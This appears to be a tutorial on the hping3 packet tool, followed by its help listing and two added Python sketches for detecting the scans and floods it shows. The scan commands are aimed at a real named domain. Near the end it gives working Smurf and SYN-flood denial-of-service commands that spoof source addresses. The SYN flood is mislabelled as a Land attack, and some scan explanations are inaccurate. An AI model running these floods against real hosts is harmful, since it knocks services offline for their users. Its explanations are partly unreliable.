hping Explained: hping3 in Detail
hping3 usage
Detailed introduction:
How to use hping3
1. Testing ICMP: In this example hping3 behaves like a normal ping utility, sending ICMP echo requests and receiving ICMP echo replies.
hping3 -1 0daysecurity.com
2. Traceroute using ICMP: This example is similar to well-known utilities such as tracert (Windows) or traceroute (Linux), which send ICMP packets and increase the TTL value by 1 each time.
hping3 --traceroute -V -1 0daysecurity.com
3. Checking a port: Here hping3 sends a SYN packet to a specified port (80 in our example). We can also control the local port from which the scan starts (5050).
hping3 -V -S -p 80 -s 5050 0daysecurity.com
4. Traceroute to a given port: A nice feature of hping3 is that you can traceroute to a specified port and watch where your packet is blocked. This is done simply by adding --traceroute to the previous command.
hping3 --traceroute -V -S -p 80 -s 5050 0daysecurity.com
5. Other types of ICMP: This example sends an ICMP address mask request (Type 17).
hping3 -c 1 -V -1 -C 17 0daysecurity.com
6. Other types of Port Scanning: The first type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed.
hping3 -c 1 -V -p 80 -s 5050 -F 0daysecurity.com
7. ACK Scan: This scan can be used to see if a host is alive (when ping is blocked, for example). This should send a RST response back if the port is open.
hping3 -c 1 -V -p 80 -s 5050 -A 0daysecurity.com
8. Xmas Scan: This scan sets the sequence number to zero and sets the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 0daysecurity.com
9. Null Scan: This scan sets the sequence number to zero and has no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -M 0 0daysecurity.com
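Seen from the receiving side, the FIN, ACK, Xmas and Null probes in items 6 to 9 are TCP segments that no established connection would produce. The sketch below is an added example, not part of the original page: it reads the flags from raw TCP headers and reports such segments the way a stateful filter would judge them. The function names, addresses and sample capture are constructed for illustration.

```python
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

def tcp_header(sport, dport, flags, seq=0):
    """Build a bare 20-byte TCP header (constructed sample input)."""
    return struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | flags, 64, 0, 0)

def probe_type(flags):
    """Map the six classic flag bits to the probe names used above."""
    flags &= 0x3F  # drop the two high bits (hping3's -X/-Y "unused" flags)
    if flags == 0:
        return "null"
    if flags == FIN | PSH | URG:
        return "xmas"
    return {FIN: "fin", ACK: "ack"}.get(flags)

def find_probes(packets):
    """Return (src, dst, dport, type) for segments no real connection would send.

    packets: iterable of (src_ip, dst_ip, tcp_header_bytes) in capture order.
    Null and Xmas segments are always reported; a bare FIN or ACK is reported
    only when no SYN was seen first for that flow, as a stateful filter
    would judge it.
    """
    opened, alerts = set(), []
    for src, dst, hdr in packets:
        if len(hdr) < 20:
            continue  # truncated capture, the flags byte cannot be read
        sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", hdr[:14])
        flow = frozenset([(src, sport), (dst, dport)])  # direction-independent key
        if off_flags & SYN:
            opened.add(flow)
            continue
        kind = probe_type(off_flags)
        if kind in ("null", "xmas") or (kind and flow not in opened):
            alerts.append((src, dst, dport, kind))
    return alerts

# Constructed sample capture: one normal handshake, then four lone probes.
SAMPLE = [
    ("198.51.100.7", "192.0.2.10", tcp_header(40000, 80, SYN)),
    ("192.0.2.10", "198.51.100.7", tcp_header(80, 40000, SYN | ACK)),
    ("198.51.100.7", "192.0.2.10", tcp_header(40000, 80, ACK)),
    ("203.0.113.5", "192.0.2.10", tcp_header(5050, 80, FIN)),
    ("203.0.113.5", "192.0.2.10", tcp_header(5050, 80, ACK)),
    ("203.0.113.5", "192.0.2.10", tcp_header(5050, 80, FIN | PSH | URG)),
    ("203.0.113.5", "192.0.2.10", tcp_header(5050, 80, 0x80)),
]
```

The ACK that completes the handshake from 198.51.100.7 is not reported, while the same flag sent from 203.0.113.5 without a preceding SYN is.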
10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
11. DoS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
--flood: send packets as fast as possible. Don't show replies.
--rand-dest: random destination address mode. See the man page.
-V --verbose: verbose mode
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport: [+][+]<port> destination port (default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)
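For monitoring, the two floods in items 10 and 11 leave distinct traces: ICMP echo requests addressed to a subnet broadcast address, and a burst of SYNs from many sources to one port. The following is an added detection sketch, not part of the original page; the record fields, thresholds, function names and sample data are assumptions constructed for illustration.

```python
import ipaddress
from collections import defaultdict

def smurf_victims(packets, local_nets):
    """Claimed sources of ICMP echo requests sent to a local broadcast address."""
    bcasts = {ipaddress.ip_network(n).broadcast_address for n in local_nets}
    return sorted({p["src"] for p in packets
                   if p["proto"] == "icmp" and p.get("icmp_type") == 8
                   and ipaddress.ip_address(p["dst"]) in bcasts})

def syn_flood_targets(packets, window=1.0, min_syns=100, min_sources=50):
    """(dst, dport) pairs hit by many SYNs from many sources in one time window."""
    buckets = defaultdict(list)
    for p in packets:
        if p["proto"] == "tcp" and p.get("flags") == "S":
            buckets[(p["dst"], p["dport"], int(p["ts"] // window))].append(p["src"])
    hits = set()
    for (dst, dport, _slot), srcs in buckets.items():
        if len(srcs) >= min_syns and len(set(srcs)) >= min_sources:
            hits.add((dst, dport))
    return sorted(hits)

def sample_capture():
    """Constructed records: a SYN burst, normal SYNs, one broadcast ping, one ping."""
    pkts = [{"ts": 0.001 * i, "proto": "tcp", "flags": "S",
             "src": f"10.{i // 250}.{i % 250}.7", "dst": "192.0.2.10", "dport": 445}
            for i in range(300)]
    pkts += [{"ts": 0.1 * i, "proto": "tcp", "flags": "S",
              "src": "198.51.100.7", "dst": "192.0.2.20", "dport": 443}
             for i in range(5)]
    pkts += [{"ts": 0.2, "proto": "icmp", "icmp_type": 8,
              "src": "192.0.2.10", "dst": "192.0.2.255"},
             {"ts": 0.3, "proto": "icmp", "icmp_type": 8,
              "src": "198.51.100.7", "dst": "192.0.2.20"}]
    return pkts
```

On Linux hosts, the kernel settings net.ipv4.icmp_echo_ignore_broadcasts and net.ipv4.tcp_syncookies address the same two conditions at the receiving end.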
Annex A: hping3 Help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)